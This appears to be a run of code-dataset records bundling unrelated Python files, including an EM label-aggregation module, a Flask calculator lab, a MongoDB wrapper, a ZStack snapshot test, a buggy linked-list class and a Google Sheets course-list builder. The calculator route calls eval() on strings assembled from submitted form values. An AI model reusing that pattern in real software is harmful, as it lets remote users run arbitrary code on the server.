self.iterations and diff >= self.epsilon:\n warnings.warn(\"Warning: EM algorithm did not converge\")\n\n self.myus_ = myus\n\n # Shows aggregated reports\n # Returs: recovered_ground_truth_ - ndarray (dim=M)\n def predict(self):\n pred = (self.myus_ > 0.5).astype(int)\n return pred\n\n def update_parameters(self, reports, myus):\n alphas = np.dot(reports, myus) / np.sum(myus)\n betas = np.dot(1 - reports, 1 - myus) / np.sum(1 - myus)\n p = np.mean(myus)\n\n return alphas, betas, p\n\n def update_myus(self, reports, alphas, betas, p):\n a_temp = (alphas ** np.transpose(reports)) * \\\n ((1 - alphas) ** np.transpose(1 - reports))\n a = np.prod(np.transpose(a_temp), axis=0)\n\n b_temp = (betas ** np.transpose(1 - reports)) * \\\n ((1 - betas) ** np.transpose(reports))\n b = np.prod(np.transpose(b_temp), axis=0)\n\n myus_numer = a * p\n myus_denom = a * p + b * (1 - p)\n myus = myus_numer / myus_denom\n\n return myus\n\n#########################################################################################\n# Class performing evaluation of subjective truthfulness of aggregation-based mechanism #\n#########################################################################################\n\nclass SubjectiveAggregator(object):\n\n # Constructor\n # parameters: reports - ndarray (dim=N*M or M, M >= 2)\n # beliefs - ndarray (dim=N*M or M, M >= 2)\n # agg - aggregation algorithm class, should have methods aggregate() and predict()\n # sampler - sampling method to use. Can be 'simple' for Bernoulli sampling or 'smart_v1'\n # for smart sampling using original dataset\n # n_sampled_peers - number of peers to sample when using sampling\n # inner_loops - number of times sampling and aggregation should be repeated\n # kwargs - additional arguments for aggregation algorithm agg\n def __init__(self, reports, beliefs, agg, sampler='simple', n_sampled_peers=100, inner_loops=1, **kwargs):\n\n if len(reports.shape) == 1:\n reports = np.array([reports])\n\n if len(beliefs.shape) == 1:\n beliefs = np.array([beliefs])\n\n if reports.shape != beliefs.shape:\n print('Shapes of reports and beliefs do not match.')\n\n self.reports = reports\n self.beliefs = beliefs\n self.agg = agg\n self.sampler = sampler\n self.n_sampled_peers = n_sampled_peers\n self.inner_loops = inner_loops\n self.kwargs = kwargs\n\n def sample_agents(self, beliefs):\n np.random.seed()\n\n if self.sampler == 'simple':\n sampled_agents = ps.sample_peers(beliefs, self.n_sampled_peers)\n elif self.sampler == 'smart_v1':\n sampled_agents = ps.smart1(beliefs, self.n_sampled_peers, self.reports)\n\n return sampled_agents\n\n def run_for_single_agent(self, beliefs, assignment):\n\n all_pred = []\n\n current_belief = beliefs[assignment]\n\n for i in range(self.inner_loops):\n sampled_agents = self.sample_agents(current_belief)\n local_agg = self.agg(**self.kwargs)\n\n local_agg.aggregate(sampled_agents)\n pred = local_agg.predict()\n if self.inner_loops > 1:\n all_pred.append(pred)\n else:\n print('agent {} done'.format(assignment))\n return pred\n\n print('agent {} done'.format(assignment))\n return np.transpose(np.array(all_pred))\n\n def run_process(self, beliefs, assignments, output_queue):\n\n total_tasks = assignments.shape[0]\n\n for i in range(total_tasks):\n result = self.run_for_single_agent(beliefs, assignments[i])\n output_queue.put((assignments[i], result))\n\n # Initiates main computation.\n # parameters: num_processes - number of processors to use for concurrency\n def run_computation(self, num_processes=1):\n\n num_agents = 
self.reports.shape[0]\n to_be_done = np.arange(num_agents)\n\n results = []\n\n while to_be_done.shape[0] > 0:\n\n que = mp.Queue()\n proc_assignments = np.array_split(to_be_done, num_processes)\n\n processes = [mp.Process(target=self.run_process, args=(self.beliefs, proc_assignments[i], que)) for i in range(num_processes)]\n\n for p in processes:\n p.start()\n\n ### IMPORTANT, prevents deadlock\n liveprocs = list(processes)\n while liveprocs:\n try:\n while 1:\n results.append(que.get(False))\n except mp.queues.Empty:\n pass\n\n # Give tasks a chance to put more data in\n time.sleep(0.5)\n\n if not que.empty():\n continue\n liveprocs = [p for p in liveprocs if p.is_alive()]\n ### END IMPORTANT\n\n for p in processes:\n p.join()\n\n while not que.empty():\n results.append(que.get())\n\n agents_done = np.array([r[0] for r in results])\n agents_left = np.setdiff1d(to_be_done, agents_done)\n to_be_done = agents_left\n\n results.sort(key = lambda t: t[0])\n results = [r[1] for r in results]\n results = np.array(results)\n\n if self.inner_loops > 1:\n self.raw_aggregated_reports_ = np.transpose(results, axes=(2, 0, 1))\n else:\n self.raw_aggregated_reports_ = results\n\n # Outputs results of main computation\n # Returns: ndarray (dim=N*M or M), where entry (i, j) = 1 if\n # mechanism is truthfull for agent i on task j, 0 otherwise.\n def show_subjective_truthfulness(self):\n truthfulness = (np.mean(self.reports == self.raw_aggregated_reports_, axis=0) \\\n > 0.5).astype(int)\n return truthfulness\n\n#################################################################################\n# This code allows using aggregation algorithms as mechanisms for paying agents #\n#################################################################################\n\nclass AggregationMechanism(object):\n\n # Constructor\n # parameters: reports - ndarray (dim=N*M or N >= 2, M >= 2)\n # agg - aggregation algorithm class, should have methods aggregate() and predict()\n # kwargs - additional arguments for aggregation algorithm agg\n # sampling - estimation method will be used if sampling=True\n # num_samp - number of peers to sample if sampling=True\n def __init__(self, reports, agg, **kwargs):\n self.reports = reports\n self.agg = agg\n self.kwargs = kwargs\n\n # Method to initialize calculation of payments\n def produce_payments(self):\n n = self.reports.shape[0]\n m = self.reports.shape[1]\n\n payments = []\n\n for i in range(n):\n cur_rep = self.reports[i, :]\n other_reps = np.delete(self.reports, i, axis=0)\n\n local_agg = self.agg(**self.kwargs)\n local_agg.aggregate(other_reps)\n\n aggregated = local_agg.predict()\n\n cur_payment = (cur_rep == aggregated).astype(int)\n payments.append(cur_payment)\n\n self.payments = np.array(payments)\n\n # Shows payment matrix\n # Returns: payments_ - ndarray (dim=N*M), where entry (i, j) is reward of agent i\n # on task j\n def show_payments(self):\n return self.payments\n","sub_path":"peerprediction/aggregation.py","file_name":"aggregation.py","file_ext":"py","file_size_in_byte":14338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"256421951","text":"import pandas as pd\n\ndef process_data(path_to_df):\n \n df1 = (\n pd.read_csv(path_to_df, header=None)\n .rename(columns = {0: 'Age', 1: \"Workclass\", 2: \"Final Weight\", 3: \"Education\", 4: \"Education Num\", 5: \"Marital Status\", 6: \"Occupation\", 7: \"Relationship\", 8: \"Race\", 9: \"Sex\", 10: \"Capital Gain\", 11: \"Capital Loss\", 12: \"Hours per Week\", 13: 
\"Native Country\", 14: \"Salary\"})\n .fillna(method=\"ffill\")\n .drop(columns={'Education Num', 'Final Weight', 'Capital Gain', 'Capital Loss'})\n )\n \n return df1\n\ndef find_and_replace(dataframe, column_name, find, replace):\n dataframe[column_name] = dataframe[column_name].str.replace(find, replace, regex=True)","sub_path":"data/processed/scripts/load_script.py","file_name":"load_script.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"343155275","text":"# Import Flask Library\n#from flask import Flask\n# create a Flask application instance\n#app = Flask(__name__)\n# define a route through the app.route decorator\n#from server import app\n#@app.route(\"/\")\n#def index():\n #return \"
Hello World!
\"\n# launch the integrated development web server\n# and run the app on http://localhost:8085\n#if __name__==\"__main__\":\n# app.run(debug=True,port=8085)\n#from server import app\n#@app.route(\"/\")\n#def index():\n# return \"
Hello world
\"\nfrom flask import Flask, redirect, render_template, request, url_for\nfrom server import app\nimport math\ncalc_input = []\nflag = False\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef calculator():\n\tglobal calc_input\n\tglobal flag\n\tif flag == True: \n\t\tcalc_input = []\n\t\tflag = False\n\tmystr = \"\"\n\tbuttons = \"1 2 3 C 4 5 6 + 7 8 9 - 0 * / = ( ) sin tan cos log sqrt CE \".split(\" \")\n\tif request.method == \"POST\":\n\t\tif (request.form[\"button\"] == \"=\"):\n\t\t\tfor i in calc_input:\n\t\t\t\tmystr += i\n\t\t\tcalc_input = []\n\t\t\tcalc_input.append(eval(mystr))\n\t\t\tflag = True\n\t\telif (request.form[\"button\"] ==\"C\"):\n\t\t\tcalc_input.pop()\n\t\telif (request.form[\"button\"] == \"CE\"):\n\t\t\tdel calc_input[:]\n\t\telse:\n\t\t\tcalc_input.append(request.form[\"button\"])\n\n\treturn render_template(\"index.html\" , output=calc_input, buttons=buttons, length=len(buttons))\n \n","sub_path":"lab05/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"304650963","text":"from futile.logging import LoggerMixin\nfrom pymongo import MongoClient\n\n\nclass MongoWrapper(LoggerMixin):\n \"\"\" Wraps a MongoDB connection.\n\n @note: Specifically created for MongoNA and MongoUI (Chile).\n @requires: pymongo\n \"\"\"\n __sensors = []\n\n def __init__(self, host=None, port=None, db=\"mtc_store\", *args, **kw):\n \"\"\" init\n\n @param host: mongoDB server address\n @param port: mongoDB server port\n @param db: mongo database name\n \"\"\"\n self.db = db\n if host and port:\n self.client = MongoClient(host, port)\n else:\n self.client = MongoClient()\n\n self.db = self.client[db]\n\n def trace(self, msg):\n \"\"\" Convenience method for low priority logging.\n\n @param msg: log message\n \"\"\"\n # DEBUG == 10\n self.logger.log(0, msg)\n\n def store_data(self, scl, sensor, data):\n \"\"\" Stores data in the collection of the sensor.\n Updates the scls collection with info about the scl and sensor.\n\n @param scl: scl ID\n @param sensor: sensor ID\n @param data: document data\n \"\"\"\n self.trace(\"storing data: %s %s\" % (sensor, data))\n if not sensor:\n return # ignore data without sensor ID\n\n if sensor.startswith(scl):\n sensor_id = sensor.replace(scl, scl.replace(\"-\", \"_\") + \"_\")\n else:\n sensor_id = scl.replace(\"-\", \"_\") + \"__\" + sensor\n if sensor_id not in self.__sensors:\n self.__sensors.append(sensor_id)\n # self.db[\"sensors\"].insert({ \"_id\": sensor})\n self.db[\"scls\"].update({\"_id\": scl},\n {\"$addToSet\": {\"sensors\": sensor_id}},\n upsert=True, )\n\n sensor = self.db[sensor_id]\n sensor.insert(data)\n\n def get_sensors(self, scl):\n \"\"\" Retrieves the sensors field of a document with _id == scl.\n\n @param scl: scl ID\n @return: list of sensors for the specified scl\n \"\"\"\n sensors = sorted(self.db[\"scls\"].find_one({\"_id\": scl})[\"sensors\"],\n cmp=lambda x, y: cmp(str(x), str(y)))\n # sensors = self.db.collection_names(include_system_collections=False)\n self.trace(\"found sensors: %s\" % (sensors))\n return sensors\n\n def get_sensor_data(self, sensor, limit=1000, skip=0):\n \"\"\" Retrieves all documents from the sensor's collection.\n\n @param sensor: unique sensor ID\n @param limit: (optional) result size limit\n @param skip: amount of documents to skip\n @return: list of documents found\n \"\"\"\n sensor = self.db[sensor]\n sensor.ensure_index(\"DescriptionDate\", background=True)\n 
cursor = sensor.find(fields={\"_id\": 0},\n limit=limit,\n sort=[(\"DescriptionDate\", 0)],\n skip=skip)\n self.trace(\"found %s documents.\" % (cursor.count()))\n return list(cursor)\n\n def get_scls(self):\n \"\"\" Retrieves all documents from the scls collection.\n\n @return: list of documents found\n \"\"\"\n cursor = self.db[\"scls\"].find(sort=[(\"_id\", 1)])\n return list(cursor)\n","sub_path":"eds/openmtc-gevent/openmtc-app/src/openmtc_app/db/mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"357514338","text":"'''\r\n\r\nTest create/restore snapshot functions, which will be happed on a running VM. \r\n\r\nThis test is to simulate user save/restore snapshot on a real running VM. \r\nThe test will be skipped, if host doesn't support live snapshot operations.\r\n\r\nWhen delete a snapshot in the middle of snapshot chain, libvirt will merge\r\nthe rest snapshots to base. The operation is only valid to living vm, only if \r\nlibvirt version is larger than 1.2.7 . If libvirt is less than 1.2.7, it needs\r\nto stop VM, before delete snapshot. It will be covered in \r\ntest_crt_sp_in_live_vm.py2\r\n\r\n@author: Youyk\r\n'''\r\nimport zstackwoodpecker.test_util as test_util\r\nimport zstackwoodpecker.test_lib as test_lib\r\nimport zstackwoodpecker.test_state as test_state\r\nimport zstackwoodpecker.zstack_test.zstack_test_snapshot as zstack_sp_header\r\nfrom distutils.version import LooseVersion\r\n\r\nimport os\r\nimport time\r\n\r\ntest_stub = test_lib.lib_get_test_stub()\r\ntest_obj_dict = test_state.TestStateDict()\r\n\r\ndef test():\r\n test_util.test_dsc('Create test vm as utility vm')\r\n vm1 = test_stub.create_vlan_vm()\r\n test_obj_dict.add_vm(vm1)\r\n #this test will rely on live snapshot capability supporting\r\n host_inv = test_lib.lib_find_host_by_vm(vm1.get_vm())\r\n\r\n if not test_lib.lib_check_live_snapshot_cap(host_inv):\r\n vm1.destroy()\r\n test_obj_dict.rm_vm(vm1)\r\n test_util.test_skip('Skip test, since [host:] %s does not support live snapshot.' 
% host_inv.uuid)\r\n\r\n live_snapshot = test_lib.lib_check_live_snapshot_cap(host_inv)\r\n if not live_snapshot:\r\n vm1.destroy()\r\n test_obj_dict.rm_vm(vm1)\r\n test_util.test_skip(\"Skip test, since [host:] %s doesn't support live snapshot \" % host_inv.uuid)\r\n\r\n vm = test_stub.create_vlan_vm()\r\n test_obj_dict.add_vm(vm)\r\n\r\n test_util.test_dsc('Create volume for snapshot testing')\r\n disk_offering = test_lib.lib_get_disk_offering_by_name(os.environ.get('smallDiskOfferingName'))\r\n volume_creation_option = test_util.VolumeOption()\r\n volume_creation_option.set_name('volume for snapshot testing')\r\n volume_creation_option.set_disk_offering_uuid(disk_offering.uuid)\r\n volume1 = test_stub.create_volume(volume_creation_option)\r\n test_obj_dict.add_volume(volume1)\r\n volume2 = test_stub.create_volume(volume_creation_option)\r\n test_obj_dict.add_volume(volume2)\r\n #make sure utility vm is starting and running\r\n vm.check()\r\n\r\n volume1.attach(vm1)\r\n volume2.attach(vm1)\r\n\r\n test_util.test_dsc('create snapshot for root')\r\n vm_root_volume_inv = test_lib.lib_get_root_volume(vm1.get_vm())\r\n snapshots = test_obj_dict.get_volume_snapshot(vm_root_volume_inv.uuid)\r\n snapshots.set_utility_vm(vm)\r\n snapshots.create_snapshot('create_root_volume_snapshot1')\r\n volume1.check()\r\n volume2.check()\r\n\r\n snapshots2 = test_obj_dict.get_volume_snapshot(volume1.get_volume().uuid)\r\n snapshots2.set_utility_vm(vm)\r\n snapshots2.create_snapshot('create_data_volume_snapshot1')\r\n snapshots.check()\r\n volume1.check()\r\n volume2.check()\r\n\r\n test_lib.lib_robot_cleanup(test_obj_dict)\r\n test_util.test_pass('Create root Snapshot and test data volume status test Success')\r\n\r\n#Will be called only if exception happens in test().\r\ndef error_cleanup():\r\n test_lib.lib_error_cleanup(test_obj_dict)\r\n","sub_path":"integrationtest/vm/virtualrouter/snapshot/test_crt_root_sp_in_live_vm_and_data.py","file_name":"test_crt_root_sp_in_live_vm_and_data.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"364407488","text":"#coding:utf-8\nclass Node(object):\n __slots__ = ['_value', '_next']\n def __init__(self, item):\n self._value = item\n self._next = None\n\n def getValue(self):\n return self._value\n\n def getNext(self):\n return self._next\n\n def setValue(self, value):\n self._value = value\n\n def setNext(self, newnext):\n self._next = newnext\n\n\n#单链表的操作\n\"\"\"\n 1.初始化\n\n #插入\n 2.在头部插入节点\n 3.在尾部追加节点\n 4.在指定index下插入节点\n\n #删除\n 5.删除头节点\n 6.删除尾节点\n 7.删除指定index的节点 \n\n 8.遍历单链表\n 9.查找第index个节点(按坐标查找)\n 10.查找value节点(按值查找)\n\"\"\"\nclass LinkList(object):\n def __init__(self):\n self._head = None\n \n def isEmpty(self):\n return self_head == None\n\n def size(self):\n current = self._head\n length = 0\n while current != None:\n current = current.getNext()\n length += 1\n return length\n\n def add(self, value):\n tmp = Node(value)\n tmp.setNext(self._head)\n self._head = tmp\n\n def append(self, value):\n tmp = Node(value)\n if isEmpty():\n self._head = tmp\n else:\n current = self._head\n while current.getNext() != None:\n current = current.getNext()\n current.setNext(tmp)\n\n def insert(self, index, value):\n if index <= 1:\n self.add(value)\n elif index > self.size():\n self.append(value)\n else:\n current = self._head\n cnt = 1\n while cnt != index-1:\n cnt += 1\n current = current.getNext()\n tmp = Node(value)\n right = current.getNext()\n current.setNext(tmp)\n 
tmp.setNext(right)\n\n\n\n\nif __name__ == '__main__':\n l = LinkList()\n","sub_path":"python/linklist.py","file_name":"linklist.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"542257694","text":"import re\ncomments = ['lmplementation note', 'changed', 'ABC for generator']\npattern = \"......\"\n\n\ndef add_ellipsis(n: int, string):\n for i in range(len(string)):\n if len(string[i]) >= n:\n regex = re.compile(string[i][n:])\n newstr = regex.sub(pattern, string[i])\n string[i] = newstr\n\n print(string)\n\n\nadd_ellipsis(10, comments)\n\n# 元组的话是不是可以转成列表后操作,不知道理解的对不对\n# comments = ('lmplementation note', 'changed', 'ABC for generator')\n# pattern = \"......\"\n#\n#\n# def add_ellipsis(n: int, string):\n# comment = list(string)\n# for i in range(len(comment)):\n# if len(comment[i]) >= n:\n# regex = re.compile(comment[i][n:])\n# newstr = regex.sub(pattern, comment[i])\n# comment[i] = newstr\n# print(comment)\n\n#\n# add_ellipsis(4, comments)","sub_path":"p17038-吴永峰/第四次作业/strsub.py","file_name":"strsub.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"334583435","text":"from redata.models.base import Base\nfrom sqlalchemy import TIMESTAMP, Boolean, Column, Integer, String, BigInteger, Date, Float, Index\nfrom redata.db_operations import metrics_session\nfrom sqlalchemy.dialects.postgresql import JSONB\nfrom datetime import datetime\nfrom sqlalchemy import Index\nfrom sqlalchemy import ForeignKey\nfrom redata.metric import Metric\n\n\nclass MetricFromCheck(Base):\n __tablename__ = 'metric'\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n check_id = Column(Integer, ForeignKey('checks.id'), index=True)\n table_id = Column(Integer, ForeignKey('monitored_table.id'), index=True)\n table_column = Column(String, index=True)\n\n metric = Column(String, index=True)\n params = Column(JSONB)\n result = Column(JSONB)\n\n created_at = Column(TIMESTAMP, default=datetime.utcnow, index=True, primary_key=True)\n\n @classmethod\n def add_metrics(cls, results, check, conf):\n\n print (f\"Adding results for check: {check}\")\n for row in results:\n \n for col, metrics in check.metrics.items():\n\n for m in metrics:\n select_name = col + '_' + m if col != Metric.TABLE_METRIC else m\n\n m = MetricFromCheck(\n check_id=check.id,\n table_id=check.table.id,\n table_column=col if col else None,\n params=check.query['params'],\n metric=m,\n result={\n 'value': row[select_name]\n },\n created_at=conf.for_time\n )\n metrics_session.add(m)\n \n metrics_session.commit()\n\n\n \n","sub_path":"redata/models/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"181191500","text":"import asyncio\n\nfrom IGitt.GitHub import GitHubToken\nfrom IGitt.GitHub import lazy_get\n\nfrom tests import IGittTestCase\n\n\nclass GitHubInitTest(IGittTestCase):\n\n def test_tokens(self):\n github_token = GitHubToken('test')\n self.assertEqual(github_token.parameter, {'access_token': 'test'})\n self.assertEqual(github_token.value, 'test')\n\n async def lazy_get_response(self, data):\n self.assertEqual(data[0]['total'], 1)\n\n def test_lazy_get(self):\n loop = asyncio.get_event_loop()\n loop.run_until_complete(lazy_get('/repos/gitmate-test-user/test/stats/contributors',\n 
self.lazy_get_response))\n","sub_path":"tests/GitHub/test_github_init.py","file_name":"test_github_init.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"294619092","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ------------------------\n# Penji OpDev Fall 2019\n# < File Function >\n# Author: Cory Paik\n# Updated: < DD.MM.YEAR >\n# ------------------------\n\n# General\nimport os\nimport time\nimport argparse\nimport pandas as pd\n# For Google Sheets\nimport pygsheets\n# Local\nimport core.utils as utils\nfrom core import logger\n#import core.gsheets_utils as gs_utils\nimport core.gs_api_utils as gs_api_\nfrom core.config import cfg\n\n\nclass GoogleSheetsParent:\n def __init__(self, args):\n self.args = args\n self.reset_gs = args.reset\n\n # Get the term (, , )\n try:\n self.cterm = cfg.GENERAL[args.term.upper()]\n self.pterm = cfg.GENERAL[args.term.upper()+'_PREV']\n except KeyError:\n logger.error(f'{args.term} not a valid option for term')\n raise SystemExit\n # Get the school config\n try:\n self.school_config = cfg[args.school.upper()]\n except KeyError:\n logger.error(f'{args.school} not a valid option for school')\n raise SystemExit\n\n\n self.files = {\n # Current Term Files\n 'ct' : (0, f'{self.cterm[0]}', self._setup_term,\n f'data/{args.school}/{self.cterm[1]}/gs_{self.cterm[1]}_{args.school}_0.csv'),\n 'ct_prof' : (1, f'Professors {self.cterm[2]}', self._setup_prof ,\n f'data/{args.school}/{self.cterm[1]}/gs_{self.cterm[1]}_{args.school}_1.csv'),\n 'ct_courses' : (2, f'Courses {self.cterm[2]}', self._setup_courses ,\n f'data/{args.school}/{self.cterm[1]}/gs_{self.cterm[1]}_{args.school}_2.csv'),\n # Previous Term Files\n 'pt' : (3, f'{self.pterm[0]}', self._setup_term,\n f'data/{args.school}/{self.pterm[1]}/gs_{self.pterm[1]}_{args.school}_0.csv'),\n 'pt_prof' : (4, f'Professors {self.pterm[2]}', self._setup_prof ,\n f'data/{args.school}/{self.pterm[1]}/gs_{self.pterm[1]}_{args.school}_1.csv'),\n 'pt_courses' : (5, f'Courses {self.pterm[2]}', self._setup_courses ,\n f'data/{args.school}/{self.pterm[1]}/gs_{self.pterm[1]}_{args.school}_2.csv'),\n # Archive Files\n 'archive_tutors' : (6, 'Tutors' , self._setup_tutors ,\n f'data/{args.school}/archive/gs_archive_{args.school}_6.csv'),\n 'archive_prof' : (7, 'Professor Archive', self._setup_archive_prof ,\n f'data/{args.school}/archive/gs_archive_{args.school}_7.csv'),\n 'archive_courses' : (8, 'Course Archive', self._setup_archive_courses ,\n f'data/{args.school}/archive/gs_archive_{args.school}_8.csv'),\n # Scraped Course Lists\n 'ct_cl' : (-1, None, None,f'data/{args.school}/{self.cterm[1]}/{args.school}_course_list.csv'),\n 'pt_cl' : (-1, None, None, f'data/{args.school}/{self.pterm[1]}/{args.school}_course_list.csv'),\n\n # Student Orgs\n 'student_orgs' : (-1, 'Student Orgs', None, f'data/{args.school}/{self.cterm[1]}/gs_{args.school}_{self.cterm[1]}_Student_Orgs.csv')\n\n }\n\n self.file_keys = ('ct', 'ct_prof', 'ct_courses', 'pt', 'pt_prof', 'pt_courses',\n 'archive_tutors', 'archive_prof', 'archive_courses')\n\n def _load_all(self):\n return [self._load(key) for key in self.file_keys]\n\n\n def _load(self, file_name_key):\n file_name = self.files[file_name_key][3]\n try:\n df = pd.read_csv(file_name)\n logger.info(f'Found Existing {self.files[file_name_key][1]}')\n return df\n except FileNotFoundError:\n #logger.error(f'File not found: {file_name}')\n self._setup(file_name_key)\n # raise SystemExit\n\n def 
_save(self, df, file_name_key):\n file_name = self.files[file_name_key][3]\n df.to_csv(index=False, path_or_buf=file_name)\n\n def _connect_google_sheet(self, sheet_name_in=None):\n # Create a new sheet in folder\n sheet_name = sheet_name_in if sheet_name_in else f'{self.school_config.NICE_NAME} Course List'\n gc = pygsheets.authorize(service_file='core/credentials/penji_dev_key.json')\n try:\n sh = gc.open(sheet_name)\n if self.reset_gs:\n gc.drive.delete(sh.id, supportsTeamDrives=True)\n sh = gc.create(sheet_name, folder=self.school_config.FOLDER_ID)\n logger.info(f'Reset {sheet_name} in google drive')\n else:\n logger.info(f'Found {sheet_name} in google drive, modifying sheet')\n except (pygsheets.exceptions.SpreadsheetNotFound, pygsheets.exceptions.WorksheetNotFound) as e:\n logger.info(f'Could not find {sheet_name} in google drive, creating a new one')\n sh = gc.create(sheet_name, folder=self.school_config.FOLDER_ID)\n self.reset_gs = True\n return sh\n\n def _setup_all(self):\n for key in self.file_keys:\n if not os.path.exists(self.files[key][3]):\n df = self._setup(key)\n self._save(df, key)\n while not os.path.exists(self.files[key][3]):\n time.sleep(1)\n\n def _setup(self, file_name_key):\n file_info = self.files[file_name_key]\n sheet_idx = file_info[0]\n gs_cl_df = None\n # Current term setup\n if sheet_idx in (0, 1, 2):\n try:\n gs_cl_df = pd.read_csv(self.files['ct'][3])\n except FileNotFoundError:\n logger.info(f'No existing Google Sheets current term file in location {self.files[\"ct\"][3]}')\n try:\n cl_df = pd.read_csv(self.files['ct_cl'][3])\n except FileNotFoundError:\n logger.info(f'No existing course list csv file found in location {self.files[\"ct_cl\"][3]}')\n raise SystemExit\n gs_cl_df = self._setup_term(cl_df)\n if self.args.save:\n self._save(gs_cl_df, 'ct')\n # If current term csv\n gs_df = gs_cl_df if sheet_idx == 0 else file_info[2](gs_cl_df)\n # Previous Term\n elif sheet_idx in (3, 4, 5):\n try:\n gs_cl_df = pd.read_csv(self.files['pt'][3])\n except FileNotFoundError:\n logger.info(f'No existing Google Sheets current term file in location {self.files[\"ct\"][3]}')\n gs_df = file_info[2](gs_cl_df)\n # Tutors & Archive\n elif sheet_idx in (6, 7, 8):\n gs_df = file_info[2](None)\n # Error, invalid sheet\n else:\n logger.error(f'{sheet_idx} not valid sheet index')\n raise SystemExit\n if self.args.save:\n self._save(gs_df, file_name_key)\n return gs_df\n\n def _setup_term(self, df):\n gs_data = None\n if isinstance(df, pd.DataFrame):\n num_rows = len(df.index)\n gs_data = {key: [None] * num_rows for key in cfg.GENERAL.WKS_COLUMNS['Term']}\n key_set = {\n 'Abbreviation': 'Department_Abbreviation',\n 'Course': 'Course_Number',\n 'Name': 'Department_Name',\n 'Title': 'Course_Name',\n 'Professor': 'Section_Professor',\n '# Students': 'Number_Students',\n 'Time': 'Section_Time',\n 'Days': 'Section_Days',\n 'Classroom': 'ClassRoom',\n 'Section Reference #': 'Reference_Number'\n }\n\n for idx, col in df.iterrows():\n # Set Directly transferable data\n for gs_key, df_key in key_set.items():\n temp_val = df[df_key][idx]\n if isinstance(temp_val, str):\n #print(temp_val)\n temp_val = temp_val.strip() # TODO: Correct formatting to avoid whitespace\n gs_data[gs_key][idx] = temp_val\n # Set Course Code\n gs_data['Course Code'][idx] = str(df['Department_Abbreviation'][idx]) + ' ' + str(\n df['Course_Number'][idx])\n\n term_df = pd.DataFrame(data=gs_data, columns=cfg.GENERAL.WKS_COLUMNS['Term'])\n\n\n print(f'num students col\\n',term_df['# Students'])\n term_df = 
term_df[term_df['# Students'] != 'Canceled']\n term_df['# Students'] = term_df['# Students'].fillna(0)\n term_df = term_df.astype(dtype={'# Students': 'int64'})\n # Workaround: If School had no student count\n if not sum(term_df['# Students']) == 0:\n term_df = term_df[term_df['# Students'] > 10]\n else:\n term_df = pd.DataFrame(data=gs_data, columns=cfg.GENERAL.WKS_COLUMNS['Term'])\n print(term_df.head())\n return term_df\n\n def _setup_prof(self, df):\n gs_data = None\n if isinstance(df, pd.DataFrame):\n all_prof = list(df['Professor'])\n professors = list({}.fromkeys(all_prof).keys())\n professors = list(set(filter(lambda v: v == v and v != '', professors)))\n full_names, first_names, last_names = [], [], []\n for all_names in professors:\n names_split = all_names.split(', ')\n for name in names_split:\n if name not in full_names:\n full_names.append(name)\n split_name = name.split()\n first_names.append(split_name[0])\n last_names.append(' '.join(split_name[1:]))\n\n gs_data = {'Full Name': full_names, 'Salutation': ['Dr.'] * len(full_names), 'First Name': first_names,\n 'Last Name': last_names, }\n prof_df = pd.DataFrame(data=gs_data, columns=cfg.GENERAL.WKS_COLUMNS['Professors'])\n return prof_df\n\n def _setup_courses(self, term_df):\n gs_data = None\n if isinstance(term_df, pd.DataFrame):\n # takes in term df\n data = {key: [] for key in cfg.GENERAL.WKS_COLUMNS['Courses']}\n for idx, col in term_df.iterrows():\n if term_df['Course Code'][idx] not in data['Course Code']:\n data['Course Code'].append(term_df['Course Code'][idx])\n data['Name'].append(term_df['Name'][idx])\n data['Title'].append(term_df['Title'][idx])\n num_rows = len(data['Course Code'])\n gs_data = {key: ([None] * num_rows if lst == [] else lst) for key, lst in data.items()}\n courses_df = pd.DataFrame(data=gs_data, columns=cfg.GENERAL.WKS_COLUMNS['Courses'])\n return courses_df\n\n def _setup_tutors(self, df):\n gs_data = None\n if isinstance(df, pd.DataFrame):\n tutors_df = df\n # num_rows = len(df.index)\n # gs_data = {key: [None] * num_rows for key in cfg.GENERAL.WKS_COLUMNS['Tutors']}\n tutors_df = pd.DataFrame(data=gs_data, columns=cfg.GENERAL.WKS_COLUMNS['Tutors'])\n return tutors_df\n\n def _setup_archive_prof(self, df):\n gs_data = None\n if isinstance(df, pd.DataFrame):\n all_prof = list(df['Professor'])\n professors = list({}.fromkeys(all_prof).keys())\n professors = list(set(filter(lambda v: v == v, professors)))\n full_names, first_names, last_names = [], [], []\n for all_names in professors:\n names_split = all_names.split(', ')\n for name in names_split:\n if name not in full_names:\n full_names.append(name)\n split_name = name.split()\n first_names.append(split_name[0])\n last_names.append(' '.join(split_name[1:]))\n\n gs_data = {'Full Name': full_names, 'Salutation': ['Dr.'] * len(full_names), 'First Name': first_names,\n 'Last Name': last_names, }\n\n prof_df = pd.DataFrame(data=gs_data, columns=cfg.GENERAL.WKS_COLUMNS['Professor Archive'])\n return prof_df\n\n\n def _setup_archive_courses(self, term_df):\n gs_data = None\n if isinstance(term_df, pd.DataFrame):\n data = {key: [] for key in cfg.GENERAL.WKS_COLUMNS['Course Archive']}\n for idx, col in term_df.iterrows():\n if term_df['Course Code'][idx] not in data['Course Code']:\n data['Course Code'].append(term_df['Course Code'][idx])\n data['Name'].append(term_df['Name'][idx])\n 